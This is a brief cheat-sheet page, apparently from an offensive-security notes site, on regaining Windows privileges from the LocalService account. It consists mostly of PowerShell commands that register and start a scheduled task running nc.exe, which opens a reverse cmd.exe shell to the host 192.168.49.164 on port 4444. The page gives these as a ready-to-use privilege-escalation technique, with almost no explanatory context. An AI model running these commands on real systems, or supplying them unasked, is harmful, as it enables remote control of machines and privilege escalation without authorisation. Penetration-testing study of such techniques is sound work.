localservice Priv Esc

When you are in local service account, you can regain permissions by scheduling a task

Give Me Back My Privileges! Please? | itm4n's blog

$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4444 -e cmd.exe`""
Register-ScheduledTask -Action $TaskAction -TaskName "Grants"
Start-ScheduledTask -TaskName "Grants"

PreviousCreate a new account (with Admin access) for RDP NextPrintspoofer PE(instantly become System!)

Last updated 1 year ago